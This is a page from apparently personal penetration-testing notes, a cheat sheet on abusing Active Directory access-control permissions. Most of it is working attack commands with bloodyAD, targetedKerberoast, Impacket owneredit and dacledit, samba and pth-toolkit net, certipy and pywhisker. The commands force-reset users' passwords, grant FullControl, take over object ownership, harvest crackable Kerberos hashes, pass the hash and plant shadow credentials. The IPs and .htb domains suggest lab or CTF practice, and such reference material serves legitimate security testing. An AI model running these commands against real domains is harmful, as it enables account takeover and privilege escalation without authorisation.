Dado1513
  • Dado1513 Pentest Notes
  • Introduction & Documentation
  • Pentesting Methodologies
  • External Recon Pentesting
  • Brute Force
  • LotL - Living off the Land
  • Pivoting Tunnelling and Port Forward
  • Active Directory
    • 🛠️Active Directory Enumeration & Attacks
    • 🛠️ACL/ACE Abuse
    • 🛠️ADCS
    • Kerberos Attack Cheatsheet
  • Linux Pentesting
    • Linux Privilege Escalation
  • Windows Pentesting
    • Windows Privilege Escalation
  • Mobile Pentesting
    • 🛠️Android Application Pentesting
    • iOS Application Pentesting
  • Cloud Pentest
    • 🛠️Cloud Pentesting
  • Wireless Pentesting
    • 🛠️WiFi Pentesting
  • Web Pentesting
    • 🛠️XSS Cheatsheet
    • 🛠️SQL Injection
  • OSINT
    • Google Dorks
  • Network Services Pentest
    • Attacking Common Services
    • 🛠️139,445 SMB
    • 🛠️161,162,10161,10162- Pentesting SNMP
    • 🛠️winrm
  • Tools
    • NetExec
    • Chisel
    • bloodyAD
    • PowerView
    • Certipy
    • sqlmap
    • mimikatz
Powered by GitBook
On this page
  • ACL/ACE Abuse
  • Generic All
  • Generic Write
  • WriteOwner
  • Resources
  1. Active Directory

ACL/ACE Abuse

ACL/ACE Abuse

Generic All

This is also known as full control. This permission allows the trustee to manipulate the target object however they wish.

The GenericAll permission grants <user/attacker> the ability to change the password of the user target without knowing their current password. This is equivalent to the "ForceChangePassword" edge in BloodHound.

Force Change Password

bloodyAD --host 10.10.11.42 -d administrator.htb -u 'attacker' -p '12345678' set password "target" "12345678"

Generic Write

Generic Write access grants you the ability to write to any non-protected attribute on the target object, including "members" for a group, and "serviceprincipalnames" for a user.

targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'

The tool will automatically attempt a targetedKerberoast attack, either on all users or against a specific one if specified in the command line, and then obtain a crackable hash. The cleanup is done automatically as well.

The recovered hash can be cracked offline using the tool of your choice.

WriteOwner

Object owners retain the ability to modify object security descriptors, regardless of permissions on the object's DACL.

To change the ownership of the object, you may use Impacket's owneredit example script (cf. "grant ownership" reference for the exact link).

owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'`

To abuse ownership of a user object, you may grant yourself the GenericAll permission.

Impacket's dacledit can be used for that purpose (cf. "grant rights" reference for the link).

dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'`

Cleanup of the added ACL can be performed later on with the same tool:

dacledit.py -action 'remove' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 
'domain'/'controlledUser':'password'`

Targeted Kerberoast

  • https://github.com/ShutdownRepo/targetedKerberoast

targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'

Force Change Password

Use samba's net tool to change the user's password. The credentials can be supplied in cleartext or prompted interactively if omitted from the command line. The new password will be prompted if omitted from the command line.

net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"`

It can also be done with pass-the-hash using pth-toolkit's net tool. If the LM hash is not known, use 'ffffffffffffffffffffffffffffffff'.

pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"`
bloodyAD --host 10.10.11.42 -d administrator.htb -u 'attacker' -p '12345678' set password "target" "12345678"

Shadow Credentials

certipy-ad shadow auto -u 'attacker' -p "WqSZAF6CysDQbGb3" -account 'target' -dc-ip '10.10.11.51' 
pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"

Resources

  • https://github.com/mantvydasb/RedTeaming-Tactics-and-Techniques/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces.md

  • https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces

  • https://m8sec.medium.com/active-directory-acl-abuse-with-kali-linux-7434a27dd938

  • https://www.thehacker.recipes/ad/movement/dacl/

PreviousActive Directory Enumeration & AttacksNextADCS

Last updated 23 days ago

🛠️